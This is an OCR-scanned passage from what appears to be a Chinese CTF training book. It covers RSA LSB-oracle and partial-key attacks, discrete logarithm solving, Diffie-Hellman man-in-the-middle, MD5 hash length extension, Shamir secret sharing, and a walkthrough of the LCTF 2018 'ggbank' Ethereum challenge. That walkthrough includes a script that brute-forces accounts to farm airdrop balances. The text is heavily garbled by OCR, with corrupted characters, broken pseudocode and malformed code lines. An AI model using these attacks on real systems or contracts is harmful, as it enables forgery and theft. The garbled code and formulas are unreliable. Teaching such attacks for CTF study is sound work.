大 素数 的 高 位 ， 就 可 以 对 私 钥 进 行 攻 击 。 一 般 ， 对 于 1024 位 的 大 素数 ， 只 需要 知道 640 位 即 可 成 功 攻 
击 。 攻 击 的 详细 实现 见 https://github.com/mimoo/RSA-and-LLL-attacks。 


7. RSA LSB Oracle 


这 是 一 种 侧 信 道 攻击 的 方法 。 如 果 可 以 控制 解密 机 ， 可 以 使 用 同一 个 未 知 的 私 铀 对 任意 密 文 进行 角 
三 任意 密 


四 
| 


密 ， 那 么 只 要 知道 明文 的 最 后 一 位 ， 就 可 以 使 用 这 种 攻击 方法 在 O(logn) 的 时 间 内 解 出 
应 的 明文 。 


已 知 c=memodn， 那 么 将 c 乘 上 2e<modn， 友 送 给 服务 器 ， 服 务 器 对 它 进 行 解密 ， 即 可 得 到 
(me2e)dmodn=(2m)edmodn=2mmodn 


显然 ，2m 是 一 个 偶数 ， 即 末尾 位 为 0。 由 于 0<m<n， 则 可 以 得 到 0<2m<2n， 因 此 2mmodn 只 存在 
两 种 情况 : 


2m'0<2m<n 
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2m-nn<2m<2n 


其 中 ，2m 的 情况 和 2m-n=0 的 情况 时 ， 结 果 是 一 个 偶数 ， 其 他 情况 下 是 个 奇数 。 这 样 ， 便 可 以 根据 奇 
偶 性 即 获得 的 结果 的 最 后 1 位 求 得 m 和 n/2 之 间 的 大 小 关系 : 当 获 得 的 结果 是 偶数 时 ，0< m<n/2， 否 
则 mn/2<m<n。 确 定 了 m 与 n/2 的 大 小 后 ， 便 可 以 求 得 m 的 最 遍 位 是 0 还 是 1。 将 乘 上 2 modn 后 的 c 当 

作 新 的 c， 继 续 进 行 上 述 操 作 ， 相 当 于 使 用 二 分 搜索 的 思想 不 断 缩小 搜索 的 学 围 ， 即 可 一 位 一 位 地 将 m 
的 值 恢 复出 来 。 

使 用 伪 代 码 摘 述 算法 如 下 : 


l=0 


= 

while (LU l= 7): 

c=cw* pow(2, e, n)%n 

if "get mLsb(e) == 0: 
a nA 


else: 
EL A 


7.5.3 离散 对 数 相关 密码 学 


7.5.3.1 ElGamal 和 ECC 
EIGamal 算 法 于 1984 年 提出 ， 是 一 种 基于 离散 对 数 的 公 钥 密码 体制 。 它 在 密码 学 上 的 安全 性 基于 以 下 
事实 : 若 p 为 一 个 大 素数 ， 设 g 为 乘法 群 Zp 的 生成 元 ， 选 择 一 个 随机 数 x， 计 算 gxmodp=y 是 比较 简 


单 的 ， 然 而 在 已 知 9、p、y 的 情况 下 ， 反 过 来 求 x ( 即 求 Zp 上 的 离散 对 数 x=logy) 则 很 困难 。 


ElGamal 的 密 钥 生成 规则 如 下 : 选择 一 个 大 素数 p 和 Zp ， 且 p-1 (ord (p) ) 存在 很 大 的 素 因 子 ， 选 
取 Zp 的 生成 元 g， 选 择 一 个 随机 整数 k (0<k<p-1) ， 计 算 y=gsmodp， 即 得 到 公 铀 为 (p，9g， 
y) ， 私 钥 为 k。 

加 密 时 ， 选 择 一 个 随机 整数 r (0<r<p-1) ， 得 到 密 文 (y1,，y2) 为 (g'modp，my'modp) ， 其 中 
m 为 明文 。 


从 时 ， 通 过 私 钥 k 计 算 


(y') yy, modp=(e”) my’” mod p=m 


寻 明文 。 其 中 ，-1 次 窜 运 算 为 在 Zp 上 求 逆 。 


ECC (Ellipse Curve Cryptography,， 椭圆 曲线 公 钥 密码 ) 是 一 种 在 椭圆 曲线 上 进行 整 吕 (坐标 均 
为 整数 的 点 ) 计算 的 公 钥 密码 体制 。ECC 也 是 基于 离散 对 数 计算 的 困难 性 ， 但 与 ElGamal 不 同 ， 它 是 
在 椭圆 曲线 的 整 点 加 法 群 上 的 离散 对 数 。 


ECC 算 法 使 用 形 如 y=x3+ax+b 且 满足 (4a“+27b*) modpz 0 的 曲线 来 进行 计算 。 对 于 椭圆 曲线 上 
的 一 个 整 点 P= (x,y) ， 规 定 整 点 的 加 法 为 : 作 P 的 切线 交 于 椭圆 曲线 于 另 一 点 R， 过 R 作 Y 轴 的 平行 
线 交 曲线 于 Q， 则 P+R=Q; 规定 整 点 的 乘法 为 : nP 等 于 n 个 P 相 加 ， 则 n=logpnP。 如 果 nP 可 以 表示 
椭圆 曲线 中 的 所 有 的 点 ， 则 称 P 为 椭圆 曲线 的 一 个 生成 元 ， 使 nP 成 为 无 穷 远 点 的 最 小 的 n 称 为 P 的 阶 。 
不 难看 出 ， 当 知道 n 和 P 时 ， 求 出 nP 是 非常 简单 的 ， 但 是 知道 nP 和 P， 求 出 n 是 很 困难 的 。 ECC 密 码 算 
法 正 是 基于 这 种 困难 性 。 


ECC 的 密 钥 生 成 过 程 如 下 : 选择 一 条 满足 性 质 的 公开 的 椭圆 曲线 E 和 和 它 的 生成 元 G6， 骨 选择 一 个 正 整 数 
n， 计 算 P=nG， 则 公 钥 为 P， 私 钥 为 n。 
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加 密 时 ， 选 择 一 个 小 于 曲线 E 的 阶 的 随机 正 整数 k， 计 算 kG= (x1，y1) ， 将 竺 加密 的 消息 编码 为 E 上 
的 一 个 点 M， 计 算 M+kP= (x2，y2) ， 其 中 P 为 公 钥 。 加 密 得 到 的 结果 为 


(CoB AALS PY) 
解密 时 ， 利 用 私 钥 n 计 算 n (x1，,，y1) =nkG=kP,， 用 (x2>，y2) 减 去 kP 即 可 得 到 明文 消息 M。 


TN EE :3 
涉及 的 代码 如 无 特别 说 明 ， 均 为 Python 语言 ， 并 使 用 Sagemath 扩 展 。 


7.5.3.2 离 敢 对 数 的 计算 
1. 暴力 计算 
当 p 的 值 不 大 大 时 ， 由 于 离散 对 数 的 取 值 一 定 在 0 ~ p-1 范 围 内 ， 显 然 可 以 暴力 穷 举 。 


例如 ， 考 虑 以 下 情 ; 


B31337 
R= 
y = 15676 


可 以 写 出 以 下 暴力 计算 代码 : 


以 下 是 椭圆 曲线 离散 对 数 的 暴力 破解 示例 。 考 虑 如 下 曲线 和 点 ， 求 logpQ: 


= 23 
= 234 

= 31337 

= (233, 18927) 
= (1926, 3590) 


在 9agemath 中 定义 该 椭圆 曲线 和 P、Q 两 个 点 ， 写 出 循环 ， 即 可 进行 暴力 破解 : 


k.<a> = GF(31337) 
E = EllipticCurve(k, [123, 234]) 
P = E([233, 18927]) 
Q = EC([1926, 3590]) 
for i in xrange(31337): 
if (iwP == 0): 
print i 
break 
# 2899 


该 方法 的 时 间 复 杂 度 为 O(n) 。 当 p 小 于 1e7 数 量 级 时 ， 暴 力 计算 是 可 以 考虑 的 。 
2. 更 高 效 的 计算 方法 


Sagemath 内 置 了 不 同 种 类 的 离散 对 数 计算 方法 ， 适 用 于 各 种 场合 。 以 下 代码 介绍 了 一 些 常 用 的 计算 
离散 对 数 的 算法 ， 具 体 使 用 条 件 等 请 参考 代码 注释 。 


F = GF(31337) 

g = F(5) 

y = F(15676) 

# 大 步 小 步 (Baby step Giant Step) 算法 ， 通用， 时 空 复杂 度 均 为 0(n**1/2) 
x = bsgs(g, y, (09, 31336), operation='*') 


# 自动 选择 bsgs 或 PohLig HeLLman 算法 ， 当 模 数 没有 大 素数 因子 时 效率 较 高 ， 时 间 复 杂 度 近似 于 0(px**1/2) 
# Pp 为 模 数 的 最 大 素 因子 

x = discrete_log(y, g, operation=’x*’) 

# Pollard rho 算法 ， 需 要 模 p 乘法 群 的 阶 为 素数 ， 时 间 复 杂 度 0(n**1/2) 

x = discrete_log_rho(y, g, operation=’‘x*' 


# Pollard Lambda 算法 ， 当 能 够 确定 所 求 值 在 某 一 小 范围 时 效率 较 高 
x = discrete_Log_Lambda(y，9g，(5909，6060)，operation='+') 


# 权 图 曲线 的 情况 ， 只 要 把 operation 换 成 加 法 
k.<a> = GF(31337) 

E = EllipticCurve(k, [123, 234]) 

P = E([233, 18927]) 

Q = E([1926, 3590]) 


# bsgs 
n = bsgs(P, Q, (0, 31336), operation='+') 


# bsgs 或 pohlig HeLLman 
x = discrete_log(Q, P, operation='+') 
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7.6 其 他 弟 见 密码 学 应 用 


7.6.1 Diffie-Hellman 密 铀 交换 


Diffie-Hellman (DH) 密 钥 交换 是 一 种 安全 协议 ， 可 以 在 双方 先前 没有 任何 共同 知识 的 情况 下 通过 
不 安全 信道 协商 出 一 个 对 称 密 铀 。 该 算法 在 1976 年 由 Bailey Whitfield Diffie 和 Martin Edward 本 
e 
共同 提出 ， 在 密码 学 上 的 安全 性 基于 离散 对 数 的 难 解 性 。 


DH 密 钥 交换 算法 的 过 程 如 下 : 假设 Alice 和 Bob 进 行 秘密 通信 ， 需 要 协商 出 一 个 密 铀 。 首先 ， 双 方 选 
择 一 个 素数 p 和 和 模 pp 乘 法 群 的 一 个 生成 元 g， 这 两 个 数 可 以 在 不 安全 的 信道 上 发 送 。 例 如 ， 人 
，Gg=2。Alice 选 择 一 个 秘密 整数 2， 计 算 4= gsmodp， 发 给 Bob。 例 如 ， 选 择 a=7， 则 A=2/mod 
=17。Bob 选 择 一 个 秘密 整数 bp， 计 算 8=gemodp， 发 给 Alice。 例 如 ， 选 择 b=13， yp-2T3mod 
=15。 此 时 Alice 和 Bob 可 以 共同 得 出 密 钥 : 


k=APmodp= Bamodp= gbmodp 


本 例 中 ，Kk=1713mod37=15/mod37=213x/mod37=35，。 


若 有 一 个 中 间 人 可 以 截获 所 有 的 信息 ， 但 不 能 进行 修改 ， 那 和 由 于 中 间 人 只 知道 4、B8、g、p, 而 不 
能 知道 0b， 故 不 能 获取 双方 协商 出 的 密 钥 ， 除 非 计算 出 log 4 或 log gB8， 计 算 离散 对 数 的 方法 和 困 


难 性 已 经 讲 过 ， 此 处 不 骨 帝 述 。 
右 中 间 人 不 仅 可 以 截获 信息 ， 还 可 以 修改 信息 ， 那 么 可 以 攻击 DH 密 钥 交换 流程 。 


DH 的 中 间 人 攻击 过 程 如 下 : 中 间 人 人 Eve 获取 到 了 pf 和 hg， 如 p=37，g=2， 现 在 AliceIf 要 把 A 友 送 给 


Bo 
。 此 时 ，Eve 截 获 4， 自 己 选 定 一 个 随机 数 el， BE = 0° 转发 给 Bob。 例 


如 ， 选 定 elj =6， 则 与 =26mod37=27。 


Bob 把 琉 送 给 Alice 时 ，Eve 重 复 上 述 步骤 ， 选 定 随 机 数 e， 将 Z 换 成 一 2 modp 转 友 给 
Alice。 例 如 ， 选 定 ez=8， 则 局 =28mod37=34。 


此 时 ，Alice 计 算出 的 密 钥 


9 a en 1 


1 1 
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t=; moqp=g moqp=A“*moap 


而 Bob 计 算出 的 密 钥 为 


k,=E modp=e"” modp=B"modp 


此 时 Eve 可 以 知道 4、 有 el1、 近 ， 目 然 可 以 计算 出 名 和 夕 。 在 Alice 回 Bob 友 送 加 密 消息 时 ，Eve 截 获 
消息 ， 使 用 解密 即 可 获取 明文 ， 再 使 用 对 明文 进行 加 密 ， 转 友 给 Bob。 此 时 Bob 可 以 使 用 ;对 消 
息 正 常 解密 ， 也 束 是 说 ， 他 不 知道 在 密 钥 交 换 的 过 程 中 出 现 了 问题 。 在 Bob[ 向 Alice 发 送 消 息 时 同 理 。 
这 样 ，Eve 即 可 控制 整个 会 话 。 


7.6.2 Hash 长 度 扩 展 攻 击 


Hash 函 数 ( 散 列 函数 ) 是 一 种 将 任意 位 信息 映射 到 相同 位 大 小 的 消息 摘要 的 方法 。 优 秀 的 Hash 消 数 
具有 不 可 逆 性 和 强 抗 碰撞 性 ， 因 而 经 弟 被 用 于 消息 认证 。 由 于 Hash 函 数 的 算法 是 公开 的 ， 故 单独 使 用 
Hash 函 数 很 不 安全 ， 攻 击 者 可 以 建立 大 量 的 数据 - 藤 列 值 数 据 库 来 进行 字典 攻击 。 为 了 避免 这 种 情 
况 ， 一 般 选 择 形 如 HH (key|message) 形式 的 Hash 函 数 ， 即 在 消息 前 附 上 一 个 固定 的 key 再 进行 获 列 
运算 。 然 而 ， 如 果 使 用 的 是 MD (Merkle-Damgard) 型 的 Hash 算 法 (如 MD5、SHA1 等 ) ， 三 
的 长 度 是 已 知 的、 消息 可 控 的 情况 下 ， 则 容易 受到 Hash 长 度 扩展 攻击 。 


MD 型 Hash 算 法 的 特点 在 于 ， 所 有 消息 在 进行 计算 时 会 在 后 面 填充 上 1 个 01 和 铝 干 00 字 节 ， 直 到 其 二 
进 制 位 数 等 于 512x+448， 表 加 上 64bit 的 消息 长 度 。 另 外 ，MD 形 式 的 Hash 算 法 是 分 组 计算 的 ， 而 每 
组 所 得 的 中 间 值 都 会 成 为 下 一 组 的 初始 向 量 。 不 难看 出 ， 如 果 我 们 知道 某 一 中 间 值 和 当前 的 长 度 ， 便 
可 以 在 后 面 附 上 其 他 消息 和 填充 字 节 ， 然 后 利用 中 间 值 “继续 算 下 去 ”， 获 得 最 终 的 Hash 值 。Hash 
长 度 扩展 攻击 正 是 基于 此 方法 。 


例如 ， 考 虑 以 下 癌 列 值 ， 假 设 hello 是 未 知 的 key，world 是 可 探 的 数据 : 


>>> msg = 'helloworld' 
>>> hashlib.md5(msg).hexdigest() 
'fc5e038d38a57032085441le7fe7019b9' 


由 此 散 列 值 ， 根 据 小 端 序 ， 可 以 得 到 MD5 的 4 个 衣 存 器 值 为 : 
AA=0x8d035efc 
BB=0x3270a538 
CC=0xe7415408 
DD=0xb01070fe 


由 于 MD5 算 法 的 Padding 方 案 是 已 知 的 ， 我 们 可 以 计算 出 经 过 填充 后 的 消息 的 值 。 假 设 附 上 一 段 新 的 
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消息 @CG， 可 以 计算 附加 新 的 消息 后 的 消息 ， 再 计算 新 消息 的 散 列 值 : 


>>> padding = '\x80' + '!\xg9' * (448 / 8 - 1 - len(msg)) + struct.pack('<Q', len(msg) * 8) 
>>> new_msg = msg + padding + "GG" 
>>> hashlib.md5(new_msg).hexdigest() 

'bf566502849a5c2b9514217e9b2e5c59， 


现在 使 用 Hash 长 度 扩展 的 方式 来 通过 之 前 的 散 列 值 计算 新 消息 的 散 列 值 。 首 先 ， 计 算 新 消息 分 组 的 填 
充 量 ， 并 组 委 好 新 的 分 组 : 


>>> new_padding = '\x89' + '\xg@' * (448 / 8 - 1 - len("GG")) + struct.pack('<Q'，LenCnew_msg) * 8) 
>>> new_block = "GG" + new_padding 


使 用 修改 过 的 MD5 算 法 代码 ， 使 用 目 定 义 IV 计 算 一 个 分 组 的 Hash 值 。 可 以 看 到 ， 它 与 正常 万 法 得 腊 
的 值 相等。 


>>> md5(AA, BB, CC, DD, new_block) 
'bf566502840a5c2b9514217e9b2e5c59' 


由 于 篇 幅 所 限 ， 此 处 MD5 算 法 的 代码 省 略 ， 请 有 兴趣 的 读者 自行 完成 。 


使 用 此 种 攻击 方法 时 ， 我 们 不 关心 原来 被 Hash 的 消息 具体 内 容 ， 而 只 关心 原来 消息 的 长 度 ， 即 实际 应 
用 中 key|message 的 长 度 。 由 于 message 往 往 是 用 户 可 控 的 值 ， 只 要 知道 服务 器 key 的 长 度 ， 即 可 成 
功 实施 攻击 。 由 于 key 一 般 不 会 太 长 ， 通 过 暴力 尝试 也 是 可 行 的 。 


目前 ， 对 于 Hash 长 度 扩 展 攻击 已 经 有 了 完备 的 工具 Hashpump， 这 是 一 个 开源 软件 ， 在 Github 上 的 
地 址 为 https://github.com/bwall/HashPump。 


Hashpump 的 使 用 示例 见 图 7-6-1。 分 别 输入 已 知 的 Hash 值 、 数 据 、key 的 长 度 和 想 添加 的 数据 ， 输 
出 的 两 行 分 别 为 新 的 Hash 值 和 新 的 数据 。 


7.6.3 Shamir 门 限 方案 


Shamir 门 限 方案 是 一 种 秘密 共享 方案 ， 由 Shamir 和 Blackly 在 1970 年 提出 。 该 方案 基于 拉 格 朗 日 插 
值 法 ,利用 多 多 项 式 只 需要 有 kK 个 方程 就 可 以 将 系数 全 部 解 出 的 特性 ， 开 发 了 将 秘密 分 成 7 份 ， 只 要 
有 其 中 的 4 份 ( 斤 7) 即 可 将 秘密 解 出 的 算法 。 


设 需 要 人/ 份 才能 解 出 秘密 消息 mm， 选择 在 1 个 随机 数 z ，…，a4 和 大 素数 p (p> 1m) ， 列 出 如 下 模 p 多 项 
式 : 
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AD=m+alxt a +…+ar1t Imodp 


VE lu LE A 
n) ) ， 这 就 是 共享 的 7 份 秘密 信息 。 


在 恢复 秘密 消息 时 只 需要 Kk 个 (% 三 (和 ) 对 ， 联 立 上 述 方程 组 ， 利 用 拉 格 明日 插值 法 或 起 阵 乘 法 ， 
即 可 求 得 秘密 消息 /7。 


目前 ，CTF 和 工程 上 常用 的 Shamir 门 限 实现 是 SecretSharing 库 ， 其 Python 版 本 实现 见 https:// 
dgit 
.Ccom/blockstack/secret-sharing。 以 下 为 该 库 的 基本 用 法 。 


将 明文 秘密 分 成 ? 份 ， 持 有 3 份 即 可 求 出 ， 分 割 操 作 如 下 : 


>>> from secretsharing import PLaintextToHexSecretSharer 

>>> shares = PlaintextToHexSecretSharer.split_secret('the quick brown fox jumps over the lazy dog', 3, 5) 

>>> shares 
['1-5ebbc684f4163392dc727eb7e899bcd3eeay5fee80228f63355b50a731b8cdb42bd8695eddf597d91'， 
'2-cb31cd23956e373cee8576bbf6c2adeaaa398630780d57290b977a2830d13619c2ce9ae2e5967827'， 
'3-456213dbf30c3053aa53d2ce98c5a56c5bac97ece31d901f125fae7a680707f626153a737c8bb3667'， 
'y-cdyc9aaeQcfOled7115d92efcea2be590318952341518fbb848599222096a08e075f2aec88c7b887'， 
'5-62f16199e31a02c72322b71f9859efb9a6747dd392ab998827378e9b1143999cbu4f1260125bbfe51'] 


恢复 操作 如 下 ， 使 用 前 3 份 来 恢复 : 


>>> PLaintextToHexSecretSharer.recover_secret(shares[9:3]) 
‘the quick brown fox jumps over the Lazy dog' 
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小 结 


在 现在 的 CTF 中 ， 大 多 数 密码 学 都 是 直接 提供 Python 或 是 其 他 语言 的 源码 及 一 些 相关 信息 供 参赛 者 进 
行 分 析 ; 也 有 毕 题 目 将 密码 学 与 Web、 逆 同 工 程 甚 全 PWN 结 合 考察 ， 因 此 往往 要 求 选手 对 Web、 逆 
向 工程 和 PWN 有 一 定 的 了 解 。 


因为 密码 学 主要 是 考察 的 是 数学 知识 ， 所 以 需要 参赛 者 学 好 数学 ， 如 高 等 数学 、 线 性 代数 、 概 率 论 、 
离散 数学 等 课程 。 当 具有 一 定 的 数学 基础 后 ， 参 赛 者 可 以 进一步 阅读 密码 学 相关 书籍 和 和 论文， 进一步 
提高 目 己 的 能 力 。 在 CTF 中 ， 大 部 分 能 够 叫 得 出 攻击 方式 名 字 的 题目 其 实 属于 密码 学 中 难度 较 低 的 
题 ， 所 以 希望 读者 在 学 习 如 LLL attack 等 各 种 攻击 方法 的 时 候 能 够 深入 探究 攻击 的 原理 ， 而 不 只 是 简 
单 地 使 用 现成 的 工具 。 
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第 8 章 智能 合约 


在 CTF 比 赛 中 ， 区 块 链 是 近年 才 出 现 的 新 题 型 ， 很 多 CTF 比 赛 中 出 现 了 区 块 链 题目 的 身影 ， 区 块 链 广 
商 也 会 举办 专 | 门 的 区 块 链 比赛 。 不 过 企 CTF 中 出 现 的 区 块 链 题目 主要 以 智能 合约 的 题目 为 主 ， 本 章 介 
绍 一 些 以 往 出 现 过 的 以 太 坊 区 块 链 题 目 ， 分 享 一 些 笔者 的 经 验 ， 市 领 读者 进入 区 块 链 智 能 合约 的 世 
寞 。 
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8.1 智能 合约 概述 


8.1.1 智能 合约 介绍 


2008 年 ， 中 本 聪 友 表 了 《比特 币 : 一 种 点 对 点 的 电子 现金 系统 》 论 文 ， 标 志 了 比特 币 的 诞生 ， 而 比特 
币 的 底层 染 构 理念 被 称 为 区 块 链 。2013 年 ， 维 塔 利 殉 - 布 特 林 受 比 特 币 的 局 友 提 出 了 以 太 坊 区 块 链 ， 

饿 称 为 第 二 代 区 块 链 平台 。 以 太 坊 在 比特 币 的 基础 上 增加 了 智能 合约 的 功能 ， 智 能 合约 可 以 看 成 运行 
在 区 块 链 上 的 程序 ， 只 要 掌握 了 solidity 语 言 ， 并 且 有 足够 的 以 太 币 支付 矿工 费 ， 那 么 任何 人 都 能 

写 智 能 合约 ， 放 到 以 太 坊 区 块 链 上 运行 。 


在 公 网 上 能 公开 访问 的 以 太 坊 分 为 多 个 网 络 ， 在 金融 市 场 上 进行 交易 的 是 主 网 络 ( 主 链 ) ， 还 有 多 个 
测试 网 络 ， 比 较 常 用 的 测试 网 络 (测试 链 ) 叫做 Ropsten， 测 试 网 络 存在 的 目的 主要 是 让 用 户 测试 自 
己 编 写 的 智能 合约 ， 并 且 在 测试 网 络 上 让 用 户 免 费 获取 以 太 币 ， 方 便 对 智能 合约 进行 测试 。 我 们 还 能 
自行 搭建 以 太 坊 区 块 链 ， 被 称 为 私 链 。CTF 中 出 现 的 题目 往往 部 署 侍 测试 链 上 ， 参 赛 者 不 需 化 费 任 亿 
代价 束 能 学 习 以 太 坊 区 块 链 ， 这 正 是 智能 合约 的 题目 能 在 CTF 中 流行 起 来 的 重要 原因 之 一 。 


8.1.2 环境 和 工具 
古人 云 “ 工 欲 善 其 事 必 先 利 其 器 ”， 在 研究 以 太 坊 智能 合约 前 ， 下 面 先 介绍 做 以 太 坊 区 块 链 的 题目 
需要 搭建 的 环境 和 将 使 用 的 工具 。 


1. 开发 环境 : Chrome、Remix、MetaMask 


在 Chrome 浏 览 器 中 残 能 进行 以 太 坊 智能 合约 的 开 上 友 工 作 ， 因 为 Solidity 语 言 有 一 个 在 线 | DE 
(https://remix.ethereum.org) 。Remix 是 一 个 使 用 Javascript 编 写 的 IDE， 能 所 用户 忽 号 的 
语言 编译 成 字 节 码 (Opcode) ， 然 后 通过 Chrome 的 MetaMask 插 件 ， 使 用 插件 中 存储 的 以 太 

坊 账 号 同 公 网 的 以 太 坊 区 块 链 网 络 友 送 交易 ， 达 到 部 署 智能 合约 、 调 用 智能 合约 的 效果 。 


MetaMask 也 提供 了 创建 以 太 坊 个 人 账号 的 功能 。 如 果 当 前 网 络 设置 的 是 测试 网 络 ， 那 么 MetaMas 
会 为 用 户 提供 一 个 链接 ， 让 用 户 免费 获取 到 以 太 币 。 


2. 以 太 坊 区 块 链 信息 查看 : Etherscan 


在 Etherscan (https://ropsten.etherscan.io) 上 5 以 查看 以 太 坊 区 块 链 上 的 所 有 信息 ， 还 能 存放 
智能 合约 的 源码 。 所 以 ， 很 多 智能 合约 的 题目 中 只 需 提供 Etherscan 上 智能 合约 的 地 址 ， 参 赛 者 就 能 
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3. 本 地 以 太 坊 环境 ( 非 必要 ) : geth 


喜欢 使 用 命令 行 的 人 可 以 在 本 地 终端 中 使 用 geth 程 序 。geth 是 官方 提供 的 以 太 坊 程序 ， 使 用 Golang 
语言 开发 ， 能 跨 平 台 运 行 ， 并 且 在 Gihtub (https://github.com/ethereum/go-ethereum) 上 天 
源 。 在 使 用 以 太 坊 的 过 程 中 ， 我 们 需要 的 所 有 功能 ， 它 几乎 都 提供 了 ， 不 仅 可 以 连接 到 公 链 、 测 试 
链 ， 还 可 以 目 建 私 链 ， 连 接 到 他 人 的 私 链 。 如 果 遇 到 以 太 坊 私 链 的 题目 ， 建 议 使 用 geth。geth 还 能 进 
行 挖 矿 、 发 送 交 易 、 查 询 区 块 链 信息 、 运 行 智能 合约 的 字 节 码 (Opcode) 、 调 试 智 能 合约 等 。 geth 
提供 了 一 系列 的 RPC (Remote Procedure Call) 接口 ， 让 用 户 通 过 网 络 进行 控制 。 


不 过 ,使 用 该 程序 存在 一 个 问题 : 不 管 是 测试 链 还 是 公 链 ， 同 步 到 最 新 区 块 需要 的 时 间 过 长 ， 并 且 消 

耗 大 量 的 硬盘 空间 。 对 于 偶尔 做 区 块 链 题 目的 人 来 说 成 本 太 大 。 常 用 的 解决 方案 是 使 用 geth 程 序 连 授 

到 他 人 的 RPC， 如 infura (https://infura.io/) 。 但 是 该 方法 仓 在 一 个 缺点 ， 很 多 RPC 国 数 被 茶 用 
了 ， 可 使 用 的 功能 变 少 ， 只 能 使 用 一 些 基 本 功能 ， 不 过 对 做 千 能 合约 的 题目 来 况 已 经 足够 了 。RPC 卫 

数列 表 和 其 使 用 的 方法 可 参考 官方 文档 ( EES /INS OM ee ee | 
je 


4. Python 的 Web3 库 


CTF 中 的 智能 合约 题目 很 少 有 能 够 手动 完成 的 ， 大 部 分 需要 参赛 者 编写 利用 脚本 。 最 方便 的 是 使 用 
来 与 脚本， 因为 Javascript 有 专门 的 Web3 库 ， 封 装 了 调用 RPC 功 能 的 国 数 。 Python 3 也 有 
门 的 Web3 库 ， 喜 欢 使 用 Python 的 读者 也 可 以 使 用 Python3 编 写 脚本 ， 安 装 命令 如 下 : 


上 述 工具 的 具体 用 法 会 在 后 续 的 题目 讲解 中 进行 介绍 。 
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8.2 以 太 坊 智能 合约 题目 示例 


8.2.1 “ 娠 手 毛 ” 


2018 年 ，LCTF 中 的 ggbank 是 典型 的 智能 合约 英 羊 毛 题 型 ， 下 面 对 该 题 进行 讲解 。 题目 只 给 了 一个 
链接 : 


https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e 
7258a 


并 且 在 Etherscan 上 公开 了 智能 合约 的 源码 ， 我 们 可 以 到 Etherscan 上 进行 源码 审计 。 


找到 PayForFlag 函 数 ， 可 以 猜测 该 函数 为 获取 flag 的 函数 。 该 函数 存在 一 个 authenticate 修 饰 器 ， 对 
该 部 分 代码 进行 审计 : 


modifier authenticate { 
require(checkfriend(msg.sender));.; 
} 
function checkfriend(address _addr) internal pure 
returns (bool success) { 
bytes29 addr = bytes29(_addr); 
bytes20 id = hex"000000000000000000000000000000000007d7ec"; 
bytes26 gg = hex"Q0000000000000000000000000000000000fffff"，; 
for (uint256 i = 0; i < 34; i++)] { 
if (addr & gg == id) { 
return true; 
} 
gg <<= 4; 
id <<= 4; 
} 
return false; 
} 
function PayForFlag(string b6demail) public payable authenticate returns (booL success){ 
require (balances[msg.sender] > 2006009) ; 
emit GetFlag(b6demail, "Get flag!"); 
} 


相关 代码 比较 少 ， 审 计 起 来 很 简单 。 checkfriend 函 数 先 对 交易 发 起 者 的 以 太 坊 账号 进行 判断 ， 再 检 
查 本 次 交易 的 交易 发 起 者 在 该 合约 中 余额 是 否 大 于 200000。 这 两 个 条 件 判 断 都 满足 后 会 调用 GetFlag 
函数 ， 传 入 用 户 输 入 的 邮箱 ，flag 会 被 bot 脚 本 自动 发 送 到 相应 的 邮箱 。 


我 们 先 来 看 checkfriend 函 数 中 的 判断 逻辑 ， 需 要 上 友 起 交易 的 用 户 的 以 太 坊 账 号 在 特定 位 置 存 在 特定 
值 0x7d7ec， 只 要 有 以 下 前 置 知 识 点 ， 那 么 想 满足 该 判断 逻辑 其 实 很 简单 : @ 在 区 块 链 上 ， 只 需 拥 有 
私 钥 并 且 账 号 的 余额 够 手续 费 ， 就 能 发 起 交易 ;，@ 以 太 坊 的 账号 是 公 钥 ， 可 以 通过 私 钥 计 算得 出 。 


我 们 只 需 随机 生成 一 个 私 钥 ， 用 专门 的 函数 计算 出 私 钥 对 应 的 公 钥 ， 如 果 计 算出 的 公 钥 不 满足 条 件 ， 
可 以 重新 生成 一 个 私 钥 。 通 过 该 方法 ,我们 就 能 爆破 出 存在 特定 值 0x7d7ec 的 账号 ， 用 该 账号 来 做 
题 ， 向 该 合约 发 起 交易 ， 就 能 满足 题目 的 判断 逻辑 了 。 通 过 私 钥 计 算 相对 应 公 钥 的 演示 代码 如 下 : 


# python3 

from ethereum.utils import privtoaddr 

priv = (123).to_bytes(32, "big") 

pub = privtoaddr(priv) 

print("private: Qx%s\npublic: QOx%s"%(priv.hex(), pub.hex())) 


我 们 再 来 研究 如 何 增加 账号 在 该 合约 中 的 余额 。 审 计 合约 的 代码 后 发 现 ， 该 合约 有 一 个 “空投 ”机 
制 ， 任 何 账号 都 有 一 次 免费 领取 1000 余 额 的 机 会 : 


uint256 public constant _airdropAmount = 1000; 
function getAirdrop() public authenticate returns (bool success){ 
if (!initialized[msg.sender]) { 
initialized[msg.sender] = true; 
balances[msg.sender] = _airdropAmount; 
-totalSupply += _airdropAmount; 


} 
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这 1000 余 额 一 个 账号 只 能 领 一 次 ， 并 不 够 获取 flag ， 继 续 审计 剩 下 的 函数 : 


function transfer(address _to, uint _value) public 

returns (bool success){ 
balances[msg.sender] = balances[msg.sender] .sub(_value); 
baLances[_to] = balances[_to] .add(_value); 
return true; 


该 合约 提供 了 给 别人 转账 的 功能 ， 这 就 产生 了 一 个 做 题 思路 : 一 个 账号 可 以 免费 获取 1000， 获 取 flag 
需要 200000， 如 果 200 个 账号 把 余额 都 转 到 一 个 账号 上 ， 那 么 该 账户 的 余额 足够 获取 flag 了 。 这 样 的 
利用 方法 即 为 “天 羊 毛 ”。 其 中 账号 是 通过 爆破 私 铀 ， 再 通过 私 钥 计算 出 来 的 ， 所 以 获取 200 个 账号 
毫 无 难度 。 


爆破 账号 的 代码 如 下 : 


from web3 import Web3 
import sha3 
from ethereum.utils import privtoaddr 


my_ipc = Web3.HTTPProvider("https://ropsten.infura.io/v3/xxxxx") 
runweb3 = Web3(my_ipc) 
drop_index = (2)] .to_bytes(32, "big") 
def run_account(): 
salt = os.urandom(10).hex() 
x=0 
while True: 
key = salt + str(x) 
priv = sha3.keccak_256(key.encode()).digest() 
public = privtoaddr(priv).hex() 
if "7d7ec" in public: 
tmp_v = int(public, 16) 
addr = "9x" + sha3.keccak_256(tmp_v.to_bytes(32,"big")+drop_index).hexdigest() 
result = runweb3.eth.getStorageAt(constract, addr) 
if result[-1] == 0: 
yield ("OQx"+public, "Qx"+priv.hex()) 
x += 1 


首先 ,需要 在 infura 注 册 一 个 账号 ， 获 取 个 人 的 RPC 地 址 ， 通 过 Web3 与 以 太 坊 区 块 链 进行 交互 。 在 
上 面 生 成 账号 的 消 数 中 ， 逊 数 开始 随机 生成 salt 变 量 ， 然 后 该 变量 加 上 循环 的 序列 号 作为 生成 私 钥 的 
